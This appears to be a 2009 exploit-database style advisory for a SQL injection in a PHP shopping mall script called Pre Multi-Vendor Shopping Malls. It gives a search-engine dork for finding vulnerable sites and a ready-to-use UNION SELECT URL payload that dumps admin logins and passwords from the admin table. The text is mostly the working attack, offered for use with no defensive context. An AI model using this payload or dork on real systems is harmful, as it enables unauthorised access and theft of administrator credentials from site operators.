####################################################################### # # Source: Pre Multi-Vendor Shopping Malls SQL Injection Vulnerability # Download: http://preproject.com/products.asp # Dork: inurl:Powered by: PreProjects + detail.php?prodid=694 # Author: Sangteamtham@gmail.com # ####################################################################### Exploit : http://server/detail.php?prodid=999999+UNION SELECT 1,2,3,group_concat(login,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 from admin Discovered since Wed, Jul 15, 2009